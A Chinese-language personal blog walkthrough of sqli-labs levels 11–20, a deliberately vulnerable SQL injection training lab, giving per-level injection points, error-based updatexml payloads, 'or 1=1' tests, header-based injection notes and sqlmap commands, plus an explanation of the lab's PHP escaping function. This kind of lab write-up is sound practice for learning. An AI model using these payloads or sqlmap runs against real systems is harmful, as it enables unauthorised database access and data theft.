hu1y40's blog

hu1y40'blog
天堂的穹空遍布地狱之火的颜色,但也是天堂。
  1. 首页
  2. 靶场
  3. sqli-labs
  4. 正文

sqli-labs 11-20

2023年10月7日 587点热度 0人点赞 0条评论

sqli-labs 11-20

11

步骤

手动

1.报错注入

fig:

payload:

1‘ and (updatexml(1,concat(0x7e,(select user()),0x7e),1)) #

sqlmap

fig:

12

步骤

手动

注入点:

fig:

1.报错注入

fig:

payload:

1") and (updatexml(1,concat(0x7e,(select user()),0x7e),1)) #

sqlmap

fig:

13

步骤

手动

注入点:

fig:

1.报错注入

fig:

payload:

1') and (updatexml(1,concat(0x7e,(select user()),0x7e),1)) #

sqlmap

fig:

14

步骤

手动

注入点:

fig:

1.报错注入

fig:

payload:

" and (updatexml(1,concat(0x7e,(select user()),0x7e),1)) #

sqlmap

fig:

15

步骤

手动

注入点:

1’ or 1=1 #

1.时间盲注

2.布尔盲注

sqlmap

fig:

16

步骤

手动

注入点:

1") or 1=1 #

1.时间盲注

2.布尔盲注

sqlmap

fig:

17

步骤

手动

注入点:

passwd

fig:

1") or 1=1 #

报错注入

php代码解释

function check_input($value)
{
if(!empty($value))
{
// truncation (see comments)
$value = substr($value,0,15);
}

// Stripslashes if magic quotes enabled
if (get_magic_quotes_gpc())
{
$value = stripslashes($value);
}

// Quote if not a number
if (!ctype_digit($value))
{
$value = "'" . mysql_real_escape_string($value) . "'";
}

else
{
$value = intval($value);
}
return $value;
}

substr()截取了前15位

magic_quotes_gpc设置是否自动为GPC(get,post,cookie)传来的数据中的'”加上反斜线。可以用get_magic_quotes_gpc()检测系统设置。

如果没有打开这项设置,可以使用addslashes()函数添加,它的功能就是给数据库查询语句等的需要在某些字符前加上了反斜线。

这些字符是单引号(')、双引号(”)、反斜线()与 NUL(NULL 字符)。

默认情况下,PHP 指令 magic_quotes_gpc 为 on,它主要是对所有的 GET、POST 和 COOKIE 数据自动运行 addslashes()。

stripslashes()去除\,两个\\会变成一个

mysql_real_escape_string() 调用mysql库的函数 mysql_real_escape_string, 在以下字符前添加反斜杠: \x00, \n, \r, \, ', " 和 \x1a.

18

步骤

手动

注入点:

user-agemt

fig:

sqlmap

fig:

sqlmap.py -r temp.txt --data "uname=admin&passwd=admin&submit=Submit"

19

通18,注入点为referer

20

步骤

手动

注入点:

cookie

fig:

sqlmap

fig:

python sqlmap.py -r temp.txt --data "uname=admin&passwd=admin&submit=Submit" --batch --dbms mysql

标签: 合集 靶场
最后更新:2023年10月7日

hu1y40

这个人很懒,什么都没留下

点赞
< 上一篇
下一篇 >

文章评论

razz evil exclaim smile redface biggrin eek confused idea lol mad twisted rolleyes wink cool arrow neutral cry mrgreen drooling persevering
取消回复
文章目录
  • sqli-labs 11-20
    • 11
      • 步骤
    • 12
      • 步骤
    • 13
      • 步骤
    • 14
      • 步骤
    • 15
      • 步骤
    • 16
      • 步骤
    • 17
      • 步骤
    • 18
      • 步骤
    • 19
    • 20
      • 步骤

分类目录

  • 0day安全
  • Bypass
  • C++Prime
  • CTF
  • DoS
  • DoS
  • FUZZ
  • iot
  • JSONP
  • MISC
  • MISC
  • PHP伪协议
  • Python
  • REVERSE
  • sqli-labs
  • SQL注入
  • Trick
  • UAF
  • WEB
  • WEB
  • XXE
  • 书籍阅读
  • 二进制
  • 代码阅读
  • 信息搜集
  • 信息泄露
  • 加密与解密
  • 双重释放漏洞
  • 反序列化
  • 命令执行
  • 命令执行
  • 堆溢出
  • 密码学
  • 弱加密
  • 提权漏洞
  • 整数溢出
  • 文件上传
  • 未分类
  • 栈溢出
  • 格式化字符串漏洞
  • 模型
  • 汇编语言
  • 渗透测试
  • 漏洞分析
  • 漏洞利用
  • 漏洞战争
  • 漏洞挖掘
  • 病毒分析
  • 越界读取
  • 路径遍历
  • 逻辑漏洞
  • 配置不当
  • 钓鱼
  • 靶场
最新 热点 随机
最新 热点 随机
加密算法 2023年度总结 RTSPServer StackOverflow Vulnerability FUZZ 总览篇 MP4Box 无限循环漏洞 CVE-2023-40477 Winrar RCE漏洞分析
CVE-2022-4565 Hutool资源消耗漏洞 bugku 富强民主 bugku 蜘蛛侠 二维码结构分析 Trinity 源码阅读 bugku split_all

COPYRIGHT © 2023 hu1y40's blog. ALL RIGHTS RESERVED.

Theme Kratos Made By Seaton Jiang

鄂ICP备2021009673号-1